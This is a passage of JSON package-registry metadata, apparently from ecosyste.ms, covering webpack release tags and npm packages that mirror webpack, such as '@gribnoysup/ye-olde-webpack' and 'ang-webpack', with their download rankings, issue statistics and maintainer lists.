:"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-27T20:37:09.444Z","dependent_packages_count":1,"downloads":17,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":50.507620471597235,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":16.43642475523786},"purl":"pkg:npm/%40gribnoysup/ye-olde-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@gribnoysup/ye-olde-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@gribnoysup/ye-olde-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@gribnoysup/ye-olde-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-27T00:06:34.042Z","issues_count":10163,"pull_requests_count":9431,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2776093.13365612,"issues_closed_count":9897,"pull_requests_closed_count":8881,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.83508806454787,"avg_comments_per_pull_request":3.1767575018555827,"merged_pull_requests_count":6017,"bot_issues_count":8,"bot_pull_requests_count":2912,"past_year_issues_count":79,"past_year_pull_requests_count":934,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":362218.7858117326,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":733,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":61,"past_year_avg_comments_per_issue":3.481012658227848,"past_year_avg_comments_per_pull_request":4.836188436830835,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":579,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1075,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":433,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@gribnoysup%2Fye-olde-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@gribnoysup%2Fye-olde-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@gribnoysup%2Fye-olde-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@gribnoysup%2Fye-olde-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@gribnoysup%2Fye-olde-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@gribnoysup%2Fye-olde-webpack/codemeta","maintainers":[{"uuid":"gribnoysup","login":"gribnoysup","name":null,"email":"petushkov.sergey@gmail.com","url":null,"packages_count":55,"html_url":"https://www.npmjs.com/~gribnoysup","role":null,"created_at":"2022-11-20T16:35:31.160Z","updated_at":"2022-11-20T16:35:31.160Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/gribnoysup/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1410230,"name":"ang-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2019-01-15T01:47:43.465Z","latest_release_published_at":"2019-01-15T01:47:43.465Z","latest_release_number":"4.28.4","last_synced_at":"2026-09-03T00:15:58.739Z","created_at":"2022-04-09T00:09:03.634Z","updated_at":"2026-09-03T00:15:58.740Z","registry_url":"https://www.npmjs.com/package/ang-webpack","install_command":"npm install ang-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.28.4"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":